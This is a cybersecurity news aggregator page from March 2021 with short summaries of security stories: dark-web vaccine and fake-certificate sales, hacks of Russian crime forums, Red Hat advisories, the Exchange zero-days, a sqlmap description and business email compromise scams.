Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Transatlantic Cable ...

 News

Welcome to the 191st iteration of the Kaspersky Transatlantic Cable podcast. On this week’s episode, Dave and I talk about fines, privacy, doxing, and more. We start with a pair of stories about fines levied on social networking sites. The first pertains to TikTok and minors, the second an Illinois ruling   show more ...

against Facebook in a class-action suit. Staying on the social media train, we also discuss a recent move by Twitter to flag false information pertaining to COVID-19 vaccines. Then, David interviews our HR team about the future of work, the state of HR, and more. We close out the podcast talking about a hacktivist group’s doxing of Gab users. If you like the podcast, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below: Facebook will pay $650 million to settle class action suit centered on Illinois privacy law TikTok set for massive $92m payout over privacy suit COVID-19: Twitter expands ‘warning labels’ to target misleading vaccine posts Passwords, private posts exposed in hack of Gab social network

image for Coronavirus vaccines ...

 Threats

In December of 2020, the US FDA approved the Pfizer vaccine against COVID-19. Within 24 hours, one of the largest global vaccination campaigns in history kicked off, with countries around the world rushing to begin the end of the pandemic. Unfortunately, supply chains haven’t been able to keep up, and poorly   show more ...

designed vaccination programs have resulted in long delays. And, of course, each country has prioritized certain groups of individuals for vaccination. What’s a desperate dose-seeker to do? And what options are open to those looking to profit from the chaos? They turn to the black market. Vaccines for sale underground You can find just about anything in dark web marketplaces. Looking for a premium porn site account? You can find one for as little as 50 cents. An “ID pack” containing full name, SSN, DOB, and phone numbers goes for about $10. Not surprisingly, since the pandemic began, a new market has opened up: selling all things related to COVID. That includes protective gear and, of course, vaccines. Dark web marketplace postings selling doses of the Moderna and Pfizer vaccines Searching 15 marketplaces, Kaspersky experts found advertisements for three major COVID vaccines: Pfizer/BioNTech, AstraZeneca, and Moderna. They also found some advertisements for unverified vaccines. Prices per dose range from $250 to $1,200, averaging around $500. Further analysis showed that pricing had increased significantly following publication of Moderna’s and Pfizer’s effectiveness, as did the number of advertisements. Sellers primarily come from France, Germany, the UK, and the USA, and communications use encrypted messaging apps such as Wickr and Telegram. Sellers predominantly request payments in the form of bitcoin, with rare exceptions accepting other cryptocurrency. That makes the payments harder to track and protects the sellers’ anonymity. Many of the sellers Kaspersky researchers found had conducted 100 to 500 such transactions. Advertisement for a full dose of the Moderna vaccine at $500, paid in bitcoin Scammers or the real deal? Of course, when you go digging for products being sold illegally, you always run the risk of wasting your money on a product that will never materialize, and vaccine doses on the dark web are no exception to the rule. However, just how many vaccine sellers are distributing real medicine is unclear. We did find positive reviews on some of the posts, suggesting that at least some users are receiving doses. Are those reviews real? Your guess is as good as ours. Reviews for one seller distributing vaccine doses. No way of telling whether real customers wrote the reviews, of course Medical institutions, pharmacies, and hospitals around the world often end the day with leftover vaccine doses. It’s not inconceivable that someone working at these facilities could pocket the extra doses and connect with dark web intermediaries to sell them. At the same time, a little bottle from a shady dealer on some anonymous forum in a dark corner of the Web can contain just about anything — from a harmless saline solution to something really dangerous. A darknet ad for a vaporizer cartridge with coronavirus vaccine from the “makers of the ‘boner pill'”? Totally legit! That said, it’s important to note that even if what’s being sold is the real deal, the dose may not be effective by the time it arrives. One of the current vaccination campaign’s major challenges is the medicine’s storage requirements. For example, vaccine doses from Pfizer and BioNTech must be kept at -70 degrees Celsius — much colder than your average freezer or ice pack. That means successfully transporting this vaccine requires a deep-freeze delivery chain. Once the vaccine thaws, it can survive for only five days. Pfizer has developed a box with dry ice packs and a GPS tracker to transport doses, but it’s hard to come by. The Moderna vaccine is slightly easier to transport, needing -20 degrees Celsius storage, and AstraZeneca’s can be stored at normal refrigerator temperatures. However, maintaining even that temperature throughout the delivery chain is far from simple, and buyers have no way of knowing the vaccine was stored appropriately, or when it was thawed. Photos from a vaccine seller in a Telegram channel showing preparation for distribution of AstraZeneca vaccine No rush for vaccination, just get the certificate People unwilling to fork over several hundred dollars to purchase a vaccine dose may go for a far cheaper scheme: buying fake vaccination certificates. European countries are the primary source for these certificates, which help ease lockdown measures for certain individuals and facilitate international travel. A European vaccination record card costs about $20–$25. Forged vaccination card for sale on a darknet forum Other countries require people to present proof they have no COVID infection before they may carry out certain activities, such as going to work in an office or making a doctor’s appointment. Scammers have been taking advantage of that fact as well. For example, in Russia, dark web users can buy a forged certificate asserting they do not have COVID. The certificate doesn’t come cheap, costing somewhere between 3,500 and 5,000 rubles ($50–$70). To buy or not to buy? Of course, darknet shopping is risky business, and it’s clear from the past year that scammers have been all too eager to profit off the current crisis. That means no one can be at all confident they will actually receive anything after transferring bitcoins, let alone a real vaccine dose that was stored properly and is safe to take. The bottom line? Wait for your turn to receive a real vaccine the right way.

image for Three Top Russian Cy ...

 Ne'er-Do-Well News

Over the past few weeks, three of the longest running and most venerated Russian-language online forums serving thousands of experienced cybercriminals have been hacked. In two of the intrusions, the attackers made off with the forums’ user databases, including email and Internet addresses and hashed passwords.   show more ...

Members of all three forums are worried the incidents could serve as a virtual Rosetta Stone for connecting the real-life identities of the same users across multiple crime forums. References to the leaked Mazafaka crime forum database were posted online in the past 48 hours. On Tuesday, someone dumped thousands of usernames, email addresses and obfuscated passwords on the dark web apparently pilfered from Mazafaka (a.k.a. “Maza,” “MFclub“), an exclusive crime forum that has for more than a decade played host to some of the most experienced and infamous Russian cyberthieves. At the top of a 35-page PDF leaked online is a private encryption key allegedly used by Maza administrators. The database also includes ICQ numbers for many users. ICQ, also known as “I seek you,” was an instant message platform trusted by countless early denizens of these older crime forums before its use fell out of fashion in favor of more private networks, such as Jabber and Telegram. This is notable because ICQ numbers tied to specific accounts often are a reliable data point that security researchers can use to connect multiple accounts to the same user across many forums and different nicknames over time. Cyber intelligence firm Intel 471 assesses that the leaked Maza database is legitimate. “The file comprised more than 3,000 rows, containing usernames, partially obfuscated password hashes, email addresses and other contact details,” Intel 471 found, noting that Maza forum visitors are now redirected to a breach announcement page. “Initial analysis of the leaked data pointed to its probable authenticity, as at least a portion of the leaked user records correlated with our own data holdings.” The attack on Maza comes just weeks after another major Russian crime forum got plundered. On Jan. 20, a longtime administrator of the Russian language forum Verified disclosed that the community’s domain registrar had been hacked, and that the site’s domain was redirected to an Internet server the attackers controlled. A note posted by a Verified forum administrator concerning the hack of its registrar in January. “Our [bitcoin] wallet has been cracked. Luckily, we did not keep large amounts in it, but this is an unpleasant incident anyway. Once the circumstances became clear, the admin assumed that THEORETICALLY, all the forum’s accounts could have been compromised (the probability is low, but it is there). In our business, it’s better to play safe. So, we’ve decided to reset everyone’s codes. This is not a big deal. Simply write them down and use them from now on.” A short time later, the administrator updated his post, saying: “We are getting messages that the forum’s databases were filched after all when the forum was hacked. Everyone’s account passwords were forcibly reset. Pass this information to people you know. The forum was hacked through the domain registrar. The registrar was hacked first, then domain name servers were changed, and traffic was sniffed.” On Feb. 15, the administrator posted a message purportedly sent on behalf of the intruders, who claimed they hacked Verified’s domain registrar between Jan. 16 and 20. “It should be clear by now that the forum administration did not do an acceptable job with the security of this whole thing,” the attacker explained. “Most likely just out of laziness or incompetence, they gave up the whole thing. But the main surprise for us was that they saved all the user data, including cookies, referrers, ip addresses of the first registrations, login analytics, and everything else.” Other sources indicate tens of thousands of private messages between Verified users were stolen, including information about bitcoin deposits and withdrawals and private Jabber contacts. The compromise of Maza and Verified — and possibly a third major forum — has many community members concerned that their real-life identities could be exposed. Exploit — perhaps the next-largest and most popular Russian forum after Verified, also experienced an apparent compromise this week. According to Intel 471, on March 1, 2021, the administrator of the Exploit cybercrime forum claimed that a proxy server the forum used for protection from distributed denial-of-service (DDoS) attacks might have been compromised by an unknown party. The administrator stated that on Feb. 27, 2021, a monitoring system detected unauthorized secure shell access to the server and an attempt to dump network traffic. Some forum lurkers have speculated that these recent compromises feel like the work of some government spy agency. “Only intelligence services or people who know where the servers are located can pull off things like that,” mused one mainstay of Exploit. “Three forums in one month is just weird. I don’t think those were regular hackers. Someone is purposefully ruining forums.” Others are wondering aloud which forum will fall next, and bemoaning the loss of trust among users that could be bad for business. “Perhaps they work according to the following logic,” wrote one Exploit user. “There will be no forums, there will be no trust between everyone, less cooperation, more difficult to find partners – fewer attacks.”

 Threat Actors

The Lazarus Group, a North Korean hacking operation also known as Hidden Cobra, is deploying TFlower ransomware, using its MATA malware framework, security firm Sygnia reports.

 Trends, Reports, Analysis

It can be unarguably stated that North Korea and cybercrime go hand in hand. The nation is highly focused on reinforcing its cyber capabilities, by all means necessary, and creating more than just a nuisance.

 Breaches and Incidents

A user on a popular hacking forum was purportedly selling the stolen credentials from 6 South American countries for the Swiss-based Adecco Group, the second-largest staffing provider in the world.

 Breaches and Incidents

The community has been connected to carding -- the trafficking of stolen financial data and payment card info -- and the discussion of topics like malware, exploits, spam, money laundering, and more.

 Feed

sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database   show more ...

management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.

 Feed

Red Hat Security Advisory 2021-0733-01 - IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit. This update upgrades IBM Java SE 7 to version 7R1 SR4-FP80. Issues addressed include a buffer overflow vulnerability.

 Feed

Red Hat Security Advisory 2021-0717-01 - IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit. This update upgrades IBM Java SE 8 to version 8 SR6-FP25. Issues addressed include buffer overflow and bypass vulnerabilities.

 Feed

Red Hat Security Advisory 2021-0719-01 - Red Hat Advanced Cluster Management for Kubernetes 2.0.8 images. Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private   show more ...

cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which resolve some security issues and bugs.

 Feed

Red Hat Security Advisory 2021-0727-01 - The Berkeley Internet Name Domain is an implementation of the Domain Name System protocols. BIND includes a DNS server ; a resolver library ; and tools for verifying that the DNS server is operating correctly. Issues addressed include a buffer overflow vulnerability.

 Feed

Enterprise cloud security firm Qualys has become the latest victim to join a long list of entities to have suffered a data breach after zero-day vulnerabilities in its Accellion File Transfer Appliance (FTA) server were exploited to steal sensitive business documents. As proof of access to the data, the cybercriminals behind the recent hacks targeting Accellion FTA servers have shared

 Feed

Following Microsoft's release of out-of-band patches to address multiple zero-day flaws in on-premises versions of Microsoft Exchange Server, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive warning of "active exploitation" of the vulnerabilities.   show more ...

<!--adsense--> The alert comes on the heels of Microsoft's disclosure that China-based hackers were

 Feed

Signaling a major shift to its ads-driven business model, Google on Wednesday unequivocally stated it would not build alternate identifiers or tools to track users across multiple websites once it begins phasing out third-party tracking cookies from its Chrome browser by early 2022. "Instead, our web products will be powered by privacy-preserving APIs which prevent individual tracking while

 Podcast

Actor, presenter and writer Robert Llewellyn, famous for playing the part of Kryten in the science-fiction comedy “Red Dwarf,” joins us as we discuss robots gone rogue, electric vehicle nightmares, and creepy companions. All this and much much more can be found in the latest edition of the “Smashing   show more ...

Security” podcast, hosted by computer security … Continue reading "Smashing Security podcast #217: Would you cuddle this revolting robot? – with Robert Llewellyn"

 Business email compromise

Business Email Compromise (BEC) scammers, who have made rich returns in recent years tricking organisations into transferring funds into their accounts, have found a new tactic which attempts to swindle Wall Street firms out of significantly larger amounts of money. Read more in my article on the Tripwire State of Security blog.

2021-03
Aggregator history
Thursday, March 04
MON
TUE
WED
THU
FRI
SAT
SUN
MarchAprilMay